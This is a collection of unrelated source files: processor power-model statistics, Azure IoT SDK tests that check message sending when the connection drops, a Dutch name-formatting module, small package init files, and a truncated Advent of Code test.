'Execution Unit/Complex ALUs/Runtime Dynamic': 0.482294,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.92614,
'Execution Unit/Floating Point Units/Runtime Dynamic': 1.15137,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.809466,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.4017,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.836034,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 3.0472,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.504818,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.553165,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 9.34466,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.363889,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0293438,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.345316,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.217015,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.709205,
'Execution Unit/Register Files/Runtime Dynamic': 0.246359,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.931951,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.92318,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 7.40357,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00302321,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00302321,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00261805,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.0010052,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00311744,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0117819,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.029528,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.208622,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.415192,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.708575,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 1.3737,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0621302,
'L2/Runtime Dynamic': 0.0148419,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 6.50833,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.54491,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.170536,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.170536,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 7.31692,
'Load Store Unit/Runtime Dynamic': 3.55647,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.420513,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.841027,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.149242,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.150158,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0678153,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.816504,
'Memory Management Unit/Runtime Dynamic': 0.217973,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 31.0707,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.26953,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0566682,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.392345,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 1.71854,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 14.2851,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 2.581551508645094,
'Runtime Dynamic': 2.581551508645094,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.220707,
'Runtime Dynamic': 0.14111,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 193.678,
'Gate Leakage': 1.54706,
'Peak Dynamic': 125.389,
'Peak Power': 158.681,
'Runtime Dynamic': 58.3378,
'Subthreshold Leakage': 31.7454,
'Subthreshold Leakage with power gating': 14.035,
'Total Cores/Area': 130.433,
'Total Cores/Gate Leakage': 1.49199,
'Total Cores/Peak Dynamic': 125.168,
'Total Cores/Runtime Dynamic': 58.1967,
'Total Cores/Subthreshold Leakage': 24.8751,
'Total Cores/Subthreshold Leakage with power gating': 10.3324,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.220707,
'Total L3s/Runtime Dynamic': 0.14111,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.2925,
'Total NoCs/Area': 1.3377,
'Total NoCs/Gate Leakage': 0.00666015,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0694515,
'Total NoCs/Subthreshold Leakage with power gating': 0.0260443}}
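The slash-separated keys above encode a McPAT-style component hierarchy ('unit/sub-block/metric'). A minimal sketch of pulling per-unit 'Runtime Dynamic' totals out of such a dict, keeping only two-segment keys so nested sub-blocks are not double-counted; `stats` is a hypothetical name for the flat per-core dict shown above, with a few entries copied in for illustration:

```python
def unit_runtime_dynamic(stats):
    """Collect per-unit 'Runtime Dynamic' values from slash-separated keys.

    Only two-segment keys (unit/metric) are kept, so deeper sub-blocks
    such as 'Instruction Fetch Unit/Branch Predictor/...' do not get
    counted twice.
    """
    out = {}
    for key, value in stats.items():
        parts = key.split('/')
        if len(parts) == 2 and parts[1] == 'Runtime Dynamic':
            out[parts[0]] = value
    return out

# A few entries taken from the dict above
stats = {
    'Instruction Fetch Unit/Runtime Dynamic': 1.3737,
    'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0117819,
    'L2/Runtime Dynamic': 0.0148419,
    'Runtime Dynamic': 14.2851,
}
print(unit_runtime_dynamic(stats))  # {'Instruction Fetch Unit': 1.3737, 'L2': 0.0148419}
```

The one-segment key 'Runtime Dynamic' (the core total) and three-segment sub-block keys are deliberately skipped.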
# File: cls/networks/__init__.py (repo: megvii-model/MABN, license: MIT)
from . import MABN
from . import resnet
# File: device_e2e/aio/test_send_message.py (repo: Azure/azure-iot-sdk-python, license: MIT)
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
import asyncio
import pytest
import logging
import json
import uuid
from azure.iot.device.exceptions import OperationCancelled
logger = logging.getLogger(__name__)
logger.setLevel(level=logging.INFO)
pytestmark = pytest.mark.asyncio
@pytest.mark.describe("Client send_message method")
class TestSendMessage(object):
@pytest.mark.it("Can send a simple message")
@pytest.mark.quicktest_suite
async def test_send_message(self, client, random_message, service_helper):
await client.send_message(random_message)
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert event.system_properties["message-id"] == random_message.message_id
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.it("Connects the transport if necessary")
@pytest.mark.quicktest_suite
async def test_connect_if_necessary(self, client, random_message, service_helper):
await client.disconnect()
assert not client.connected
await client.send_message(random_message)
assert client.connected
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.dropped_connection
@pytest.mark.describe("Client send_message method with dropped connections")
class TestSendMessageDroppedConnection(object):
@pytest.fixture(scope="class")
def extra_client_kwargs(self):
return {"keep_alive": 5}
@pytest.mark.it("Sends if connection drops before sending")
@pytest.mark.uses_iptables
async def test_sends_if_drop_before_sending(
self, client, random_message, dropper, service_helper
):
assert client.connected
dropper.drop_outgoing()
send_task = asyncio.create_task(client.send_message(random_message))
while client.connected:
await asyncio.sleep(1)
assert not send_task.done()
dropper.restore_all()
while not client.connected:
await asyncio.sleep(1)
await send_task
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
logger.info("sent from device= {}".format(random_message.data))
logger.info("received at eventhub = {}".format(event.message_body))
assert json.dumps(event.message_body) == random_message.data
logger.info("Success")
@pytest.mark.it("Sends if connection rejects send")
@pytest.mark.uses_iptables
async def test_sends_if_reject_before_sending(
self, client, random_message, dropper, service_helper
):
assert client.connected
dropper.reject_outgoing()
send_task = asyncio.create_task(client.send_message(random_message))
while client.connected:
await asyncio.sleep(1)
assert not send_task.done()
dropper.restore_all()
while not client.connected:
await asyncio.sleep(1)
await send_task
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
logger.info("sent from device= {}".format(random_message.data))
logger.info("received at eventhub = {}".format(event.message_body))
assert json.dumps(event.message_body) == random_message.data
logger.info("Success")
@pytest.mark.describe("Client send_message with reconnect disabled")
class TestSendMessageRetryDisabled(object):
@pytest.fixture(scope="class")
def extra_client_kwargs(self):
return {"keep_alive": 5, "connection_retry": False}
@pytest.fixture(scope="function", autouse=True)
async def reconnect_after_test(self, dropper, client):
yield
dropper.restore_all()
await client.connect()
assert client.connected
@pytest.mark.it("Can send a simple message")
async def test_send_message(self, client, random_message, service_helper):
await client.send_message(random_message)
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.it("Automatically connects if transport manually disconnected before sending")
async def test_connect_if_necessary(self, client, random_message, service_helper):
await client.disconnect()
assert not client.connected
await client.send_message(random_message)
assert client.connected
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.it("Automatically connects if transport automatically disconnected before sending")
@pytest.mark.uses_iptables
async def test_connects_after_automatic_disconnect(
self, client, random_message, dropper, service_helper
):
assert client.connected
dropper.drop_outgoing()
while client.connected:
await asyncio.sleep(1)
assert not client.connected
dropper.restore_all()
await client.send_message(random_message)
assert client.connected
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.it("Fails if connection disconnects before sending")
@pytest.mark.uses_iptables
async def test_fails_if_disconnect_before_sending(self, client, random_message, dropper):
assert client.connected
dropper.drop_outgoing()
send_task = asyncio.create_task(client.send_message(random_message))
while client.connected:
await asyncio.sleep(1)
with pytest.raises(OperationCancelled):
await send_task
@pytest.mark.it("Fails if connection drops before sending")
@pytest.mark.uses_iptables
async def test_fails_if_drop_before_sending(self, client, random_message, dropper):
assert client.connected
dropper.drop_outgoing()
with pytest.raises(OperationCancelled):
await client.send_message(random_message)
assert not client.connected
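The tests above repeat the same poll-until loop (`while client.connected: await asyncio.sleep(1)`). A hedged sketch of factoring that pattern into a reusable helper; `wait_until` is hypothetical and not part of the SDK:

```python
import asyncio

async def wait_until(predicate, interval=1, timeout=30):
    """Poll `predicate` until it returns True, mirroring the sleep-loop
    pattern used in the tests above; raise if the timeout elapses."""
    elapsed = 0
    while not predicate():
        if elapsed >= timeout:
            raise TimeoutError("condition not met within timeout")
        await asyncio.sleep(interval)
        elapsed += interval

# Example: wait for a flag that flips on the third poll
state = {"ready": False, "polls": 0}

def check():
    state["polls"] += 1
    if state["polls"] >= 3:
        state["ready"] = True
    return state["ready"]

asyncio.run(wait_until(check, interval=0, timeout=5))
```

In the tests this would read e.g. `await wait_until(lambda: not client.connected)` in place of the inline loops.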
# File: src/openpersonen/features/aanschrijfwijze/aanschrijfwijze.py (repo: maykinmedia/open-personen, license: RSA-MD)
from openpersonen.features.constants import *
def get_aanschrijfwijze_first_name(first_name):
split_first_name = first_name.split()
return "".join(f"{name[0]}." for name in split_first_name)
def get_aanschrijfwijze_with_title(
last_name_prefix,
last_name,
first_name,
partner_last_name_prefix,
partner_last_name,
indication_name_use,
title,
):
last_name_prefix = last_name_prefix if isinstance(last_name_prefix, str) else None
last_name = last_name if isinstance(last_name, str) else None
first_name = first_name if isinstance(first_name, str) else None
partner_last_name_prefix = (
partner_last_name_prefix if isinstance(partner_last_name_prefix, str) else None
)
partner_last_name = (
partner_last_name if isinstance(partner_last_name, str) else None
)
indication_name_use = (
indication_name_use if isinstance(indication_name_use, str) else None
)
title = title if isinstance(title, str) else None
aanschrijfwijze = ""
if indication_name_use == EIGEN:
aanschrijfwijze = (
f"{title.lower()} {get_aanschrijfwijze_first_name(first_name)}"
)
if last_name_prefix:
aanschrijfwijze += f" {last_name_prefix}"
aanschrijfwijze += f" {last_name}"
elif indication_name_use == PARTNER_NA_EIGEN:
aanschrijfwijze = (
f"{title.lower()} {get_aanschrijfwijze_first_name(first_name)}"
)
if last_name_prefix:
aanschrijfwijze += f" {last_name_prefix}"
aanschrijfwijze += f" {last_name}-"
if partner_last_name_prefix:
aanschrijfwijze += f"{partner_last_name_prefix} "
aanschrijfwijze += f"{partner_last_name}"
elif indication_name_use == PARTNER_VOOR_EIGEN:
aanschrijfwijze = f"{get_aanschrijfwijze_first_name(first_name)}"
if partner_last_name_prefix:
aanschrijfwijze += f" {partner_last_name_prefix}"
aanschrijfwijze += f" {partner_last_name}-{title.lower()}"
if last_name_prefix:
aanschrijfwijze += f" {last_name_prefix}"
aanschrijfwijze += f" {last_name}"
return aanschrijfwijze
def get_aanschrijfwijze_based_on_partner_title(
last_name_prefix,
last_name,
first_name,
partner_last_name_prefix,
partner_last_name,
indication_name_use,
partner_title,
):
aanschrijfwijze = ""
if indication_name_use == PARTNER_NA_EIGEN:
aanschrijfwijze = f"{get_aanschrijfwijze_first_name(first_name)}"
if last_name_prefix:
aanschrijfwijze += f" {last_name_prefix}"
aanschrijfwijze += (
f" {last_name}-{MALE_TO_FEMALE_TITLES[partner_title].lower()}"
)
if partner_last_name_prefix:
aanschrijfwijze += f" {partner_last_name_prefix}"
aanschrijfwijze += f" {partner_last_name}"
elif indication_name_use == PARTNER:
aanschrijfwijze = f"{get_aanschrijfwijze_first_name(first_name)} {MALE_TO_FEMALE_TITLES[partner_title].lower()}"
if partner_last_name_prefix:
aanschrijfwijze += f" {partner_last_name_prefix}"
aanschrijfwijze += f" {partner_last_name}"
elif indication_name_use == PARTNER_VOOR_EIGEN:
aanschrijfwijze = f"{get_aanschrijfwijze_first_name(first_name)} {MALE_TO_FEMALE_TITLES[partner_title].lower()}"
if last_name_prefix and partner_last_name_prefix:
aanschrijfwijze += f" {partner_last_name_prefix}"
aanschrijfwijze += f" {partner_last_name}-"
if last_name_prefix:
aanschrijfwijze += f"{last_name_prefix} "
aanschrijfwijze += f"{last_name}"
return aanschrijfwijze
def get_default_aanschrijfwijze(
last_name_prefix,
last_name,
first_name,
partner_last_name_prefix,
partner_last_name,
indication_name_use,
):
aanschrijfwijze = ""
if indication_name_use == EIGEN:
aanschrijfwijze = f"{get_aanschrijfwijze_first_name(first_name)}"
if last_name_prefix:
aanschrijfwijze += f" {last_name_prefix}"
aanschrijfwijze += f" {last_name}"
elif indication_name_use == PARTNER_NA_EIGEN:
aanschrijfwijze = f"{get_aanschrijfwijze_first_name(first_name)}"
if last_name_prefix:
aanschrijfwijze += f" {last_name_prefix}"
aanschrijfwijze += f" {last_name}-"
if partner_last_name_prefix:
aanschrijfwijze += f"{partner_last_name_prefix} "
aanschrijfwijze += f"{partner_last_name}"
elif indication_name_use == PARTNER:
aanschrijfwijze = f"{get_aanschrijfwijze_first_name(first_name)}"
if partner_last_name_prefix:
aanschrijfwijze += f" {partner_last_name_prefix}"
aanschrijfwijze += f" {partner_last_name}"
elif indication_name_use == PARTNER_VOOR_EIGEN:
aanschrijfwijze = f"{get_aanschrijfwijze_first_name(first_name)}"
if partner_last_name_prefix:
aanschrijfwijze += f" {partner_last_name_prefix}"
aanschrijfwijze += f" {partner_last_name}-"
if last_name_prefix:
aanschrijfwijze += f"{last_name_prefix} "
aanschrijfwijze += f"{last_name}"
return aanschrijfwijze
def get_aanschrijfwijze(
last_name_prefix,
last_name,
first_name,
partner_last_name_prefix,
partner_last_name,
indication_name_use,
gender_designation,
title,
partner_title,
):
last_name_prefix = last_name_prefix if isinstance(last_name_prefix, str) else None
last_name = last_name if isinstance(last_name, str) else None
first_name = first_name if isinstance(first_name, str) else None
partner_last_name_prefix = (
partner_last_name_prefix if isinstance(partner_last_name_prefix, str) else None
)
partner_last_name = (
partner_last_name if isinstance(partner_last_name, str) else None
)
indication_name_use = (
indication_name_use if isinstance(indication_name_use, str) else None
)
gender_designation = (
gender_designation if isinstance(gender_designation, str) else None
)
title = title if isinstance(title, str) else None
partner_title = partner_title if isinstance(partner_title, str) else None
use_own_title = title in [JONKHEER, JONKVROUW] and indication_name_use != PARTNER
title_based_on_partner = (
partner_title in [BARON, PRINS]
and gender_designation == FEMALE
and indication_name_use != EIGEN
)
if use_own_title:
aanschrijfwijze = get_aanschrijfwijze_with_title(
last_name_prefix,
last_name,
first_name,
partner_last_name_prefix,
partner_last_name,
indication_name_use,
title,
)
elif title_based_on_partner:
aanschrijfwijze = get_aanschrijfwijze_based_on_partner_title(
last_name_prefix,
last_name,
first_name,
partner_last_name_prefix,
partner_last_name,
indication_name_use,
partner_title,
)
else:
aanschrijfwijze = get_default_aanschrijfwijze(
last_name_prefix,
last_name,
first_name,
partner_last_name_prefix,
partner_last_name,
indication_name_use,
)
return aanschrijfwijze
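The initials helper at the top of this module drives all of the salutation variants above. A quick self-contained check of its behaviour (the function body is copied here so it runs without the openpersonen package):

```python
# Self-contained copy of get_aanschrijfwijze_first_name from above:
# turns each given name into its first letter followed by a dot.
def get_aanschrijfwijze_first_name(first_name):
    split_first_name = first_name.split()
    return "".join(f"{name[0]}." for name in split_first_name)

print(get_aanschrijfwijze_first_name("Jan Willem"))  # J.W.
print(get_aanschrijfwijze_first_name("Anna"))        # A.
```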
# File: mdx_pmwiki_footnotes/__init__.py (repo: JD-P/mdx_pmwiki_footnotes, license: MIT)
from .pmwiki_footnotes import PmWikiFootnotes
def makeExtension(**kwargs):
return PmWikiFootnotes(**kwargs)
# File: conf_global.py (repo: sriiora/tcf, license: Apache-2.0)
#! /usr/bin/python3
import tcfl.tc_clear_bbt
tcfl.tc.tc_c.driver_add(tcfl.tc_clear_bbt.tc_clear_bbt_c)
# File: agnes/nns/__init__.py (repo: rotinov/AGNES, license: MIT)
from agnes.nns import mlp, cnn, rnn
from agnes.nns.initializer import MLP, CNN, RNN, RNNCNN, GRUCNN, LSTMCNN
# File: day17/python/dfriedenberger/src/util_test.py (repo: jamhocken/aoc-2020, license: MIT)
import pytest
def test_1():
    from util import Cube
    cube = Cube()
    cube.loadFromFile("testinput.txt")
    assert 5 == cube.count()


def test_2():
    from util import Cube
    cube = Cube()
    cube.loadFromFile("testinput.txt")
    for i in range(0, 6):
        cube = cube.next()
    assert 112 == cube.count()


def test_3():
    from util import Cube4D
